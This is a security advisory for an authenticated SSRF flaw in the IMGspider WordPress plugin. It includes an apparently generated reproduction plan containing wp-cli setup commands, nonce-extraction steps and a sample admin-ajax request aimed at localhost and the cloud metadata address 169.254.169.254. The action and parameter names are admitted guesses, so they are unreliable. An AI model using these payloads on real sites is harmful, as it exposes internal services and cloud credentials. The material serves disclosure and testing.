IMGspider <= 2.3.12 - Authenticated (Contributor+) Server-Side Request Forgery
Description
The IMGspider – 图片采集抓取插件 plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.12. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=2.3.12This research plan targets **CVE-2026-22482**, an authenticated SSRF vulnerability in the **IMGspider** plugin. Since source files are not provided, this plan focuses on identifying the specific AJAX/REST entry points used for image "spidering" or "crawling" which are common in this plugin's functio…
Show full research plan
This research plan targets CVE-2026-22482, an authenticated SSRF vulnerability in the IMGspider plugin. Since source files are not provided, this plan focuses on identifying the specific AJAX/REST entry points used for image "spidering" or "crawling" which are common in this plugin's functional domain.
1. Vulnerability Summary
The IMGspider plugin (slug: imgspider) is designed to crawl and grab images from external URLs. The vulnerability exists because the plugin fails to properly validate or sanitize the target URL provided by an authenticated user (Contributor+) before performing a server-side request. An attacker can supply internal IP addresses (e.g., 127.0.0.1, 169.254.169.254) or internal hostnames to scan ports or access sensitive internal metadata services.
2. Attack Vector Analysis
- Endpoint: Likely an AJAX handler registered via
wp_ajax_or a REST API route registered viaregister_rest_route. - Authentication: Contributor level (can access
wp-adminbut restricted permissions). - Vulnerable Parameter: A parameter typically named
url,src, orlink(inferred). - Preconditions: The attacker must be logged in as a Contributor or higher.
3. Code Flow (Inferred)
- Registration: The plugin registers an AJAX action for fetching remote content (e.g.,
wp_ajax_imgspider_fetchorwp_ajax_imgspider_get_images). - Input: The handler function retrieves a URL from
$_POST['url']or$_GET['url']. - Lack of Validation: The code may check if the user is logged in but fails to restrict the URL to public/remote schemes and non-internal IP ranges.
- Sink: The URL is passed directly to a WordPress HTTP function like
wp_remote_get(),wp_remote_post(), or a PHP function likefile_get_contents()orcurl_exec(). - Response: The server fetches the content and often returns it (or metadata about it) to the user.
4. Nonce Acquisition Strategy
Contributors can access the WordPress dashboard. The plugin likely enqueues a script in the post editor or its own settings page that contains a nonce.
- Identify the Script/Nonce: Search the plugin code for
wp_localize_script.- Search command:
grep -r "wp_localize_script" wp-content/plugins/imgspider/
- Search command:
- Create a Triggering Post:
wp post create --post_type=post --post_status=publish --post_author=[CONTRIBUTOR_ID] --post_title="SSRF Test"
- Extract via Browser:
- Log into the browser as the Contributor.
- Navigate to the edit page of the newly created post.
- Use
browser_evalto find the nonce in the global JS object. - Probable Variable:
window.imgspider_obj?.nonceorwindow.img_spider_vars?.security.
5. Exploitation Strategy
The goal is to force the server to request an internal resource.
- Step 1: Identify the AJAX Action.
Run:grep -r "wp_ajax_" wp-content/plugins/imgspider/to find the handler. Let's assume the action isimgspider_crawl. - Step 2: Prepare the Payload.
Target internal resources:- Localhost:
http://127.0.0.1:80 - AWS Metadata:
http://169.254.169.254/latest/meta-data/
- Localhost:
- Step 3: Send the Request.
Use thehttp_requesttool to simulate the AJAX call.
Sample HTTP Request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [Contributor Cookies]
action=imgspider_crawl&url=http://127.0.0.1:80&_ajax_nonce=[NONCE]
6. Test Data Setup
- Install Plugin: Ensure
imgspiderversion<= 2.3.12is installed. - Create User:
wp user create attacker attacker@example.com --role=contributor --user_pass=password123 - Local "Internal" Service: Start a simple listener on a port not exposed to the public (e.g., port 8000) inside the environment to verify the SSRF hit.
python3 -m http.server 8000 &
7. Expected Results
- Success: The response from
admin-ajax.phpcontains the HTML/content of the internal service (the Python file listing or AWS metadata) OR the timing of the response indicates a successful connection to an open internal port versus a closed one. - Confirmation: If the plugin "grabs" images, it might return a list of "found" images from the internal page.
8. Verification Steps
- Check Server Logs: Inspect the logs of the internal Python listener (
python3 -m http.server 8000) to see the incoming request from the WordPress server's IP. - Database Check: If the plugin saves the "crawled" content, check the
wp_postsorwp_optionstable:wp db query "SELECT post_content FROM wp_posts WHERE post_title LIKE '%spider%'"
9. Alternative Approaches
If no AJAX action is found:
- Check REST API: Search for
register_rest_route. The payload would then be aPOSTorGETrequest to/wp-json/imgspider/v1/.... - Check Shortcodes: If the plugin processes URLs via a shortcode during post preview/save, use
wp post createwith a payload like[imgspider url="http://127.0.0.1:80"]and view the post. - Settings Page SSRF: Check if the plugin has a "test connection" or "import from URL" feature in its admin settings page (
/wp-admin/admin.php?page=imgspider). Contributors might have access to specific sub-pages if the capability check is weak (e.g.,edit_postsinstead ofmanage_options).
Summary
The IMGspider plugin for WordPress (<= 2.3.12) is vulnerable to authenticated Server-Side Request Forgery (SSRF) via its image crawling functionality. This allows authenticated attackers with Contributor-level access or higher to perform web requests to arbitrary internal or external locations, potentially exposing sensitive internal services or cloud environment metadata.
Exploit Outline
To exploit this vulnerability, an attacker with Contributor-level authentication identifies the AJAX action used by the plugin for image crawling (e.g., imgspider_crawl). The attacker first obtains a security nonce, which is typically localized in the WordPress admin dashboard's JavaScript variables (e.g., window.imgspider_obj.nonce). They then send a POST request to /wp-admin/admin-ajax.php containing the action, the valid nonce, and a url parameter. By setting the url to an internal resource (such as http://127.0.0.1:80 or http://169.254.169.254/latest/meta-data/), the attacker forces the server to fetch content from that location and return it in the response.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.